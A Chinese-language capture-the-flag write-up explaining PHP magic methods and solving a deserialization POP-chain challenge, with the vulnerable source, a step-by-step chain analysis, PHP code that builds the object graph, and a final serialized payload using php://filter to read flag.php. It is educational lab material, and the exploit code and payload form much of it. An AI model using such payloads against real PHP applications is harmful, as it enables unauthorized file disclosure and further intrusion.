本题考点:php反序列化的pop链
首先来了解一下pop链是什么,它类似于多米诺骨牌一环套一环,要调用这个成员方法然后去找能调用这个方法的魔术方法,最后一环接一环,完成一个链子,最终形成payload。
那么来了解一下这些魔术方法
__construct() //类的构造函数,创建对象时触发(new 对象())
__destruct() //类的析构函数,对象被销毁时触发(调用完后就会触发)(反序列化调用对象时也会触发)
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //读取不可访问属性的值时,这里的不可访问包含私有属性或未定义
__set() //在给不可访问属性赋值时触发
__isset() //当对不可访问属性调用 isset() 或 empty() 时触发
__unset() //在不可访问的属性上使用unset()时触发
__invoke() //当尝试以调用函数的方式调用一个对象时触发(当对象以class名()输出时会触发)
__sleep() //执行serialize()时,先会调用这个方法
__wakeup() //执行unserialize()时,先会调用这个方法
__toString() //当反序列化后的对象被输出在模板中的时候(转换成字符串的时候)自动调用(用echo输出对象的时候会触发)(php中echo 只能输出字符串,而print_r()可以输出对象,数组等)好那么看题
Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->str->source;
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function();
}
}
if(isset($_GET['pop'])){
@unserialize($_GET['pop']);
}
else{
$a=new Show;
highlight_file(__FILE__);
}
首先看有危害的地方,如:eval,assert,system,include等危险函数,本题有危害的地方是
public function append($value){
include($value);
}
这里定义了一个参数可以包含文件,而本题开头也有提示,flag在flag.php里面。
那么接下来找哪里调用了这个方法
public function __invoke(){
$this->append($this->var);
}
可以看到invoke()这个魔术方法调用了append方法,那么如何触发(当对象被当作函数触发时)也就是类名加上(),
找下一环怎么才能让对象被当作函数触发
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function();
}
}
这里最后如果把p传入一个append的对象Modifier,那么最后会返回Modifier(), __construct()(这个方法创建对象或者实例化对象就触发不用理它),那么着重看__get(),这个要调用一个不存在的成员变量来触发,那么下一步就是去找如何才能调用不存在的成员变量
public function __toString(){
return $this->str->source;
}
这里的意思是如果触发__toString(),那么返回str里的source属性,先不用管它为什么同为属性,str就能调用source,这里把它当成了一个对象,那么如果给str赋一个没有source的对象,这不就有不存在的成员变量了嘛,那么可以给str赋值为Test来触发__get方法。这个__toString()的触发方式是把对象当成字符串:
__toString() //当反序列化后的对象被输出在模板中的时候(转换成字符串的时候)自动调用(用echo输出对象的时候会触发)(php中echo 只能输出字符串,而print_r()可以输出对象,数组等)
来找一个有echo且能赋值的地方
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
这里就能赋值的同时用echo输出,那么给source赋值一个对象就行了,其他两个类都用了,这次就只能用它本身的类Show了,这里是__construct()方法就不用想办法让它触发了,那么一个pop链就完成了,这里我用的是倒推法
__construct-> __toString()->__get()->__invoke()-> append($value)(触发文件包含)
那么就把这些序列化吧,
<?php
class Modifier {
protected $var="php://filter/read=convert.base64-encode/resource=flag.php";
}
class Show{
public $source;
public $str;
}
class Test{
public $p;
public function __get($key){
$function = $this->p;
return $function();
}
}
$a = new Modifier();
$b = new Show();
$c = new Test();
$b->str=$c;
$b->source=$b;
$c->p=$a;
echo serialize($b);
?>这里用php://filter的原因是,只用flag.php是读取不到的。
对了,protected方法有特殊字符占位所以要在变量前输入%00*%00,简单点的方法就是在echo后面加一个urlencode()
最后输出$b也就是show对象的原因是它底下的两个变量都成了另外两个类了,直接输它省事。
Payload:O:4:"Show":2:{s:6:"source";r:1;s:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:6:"%00*%00var";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}}}
最后得出flag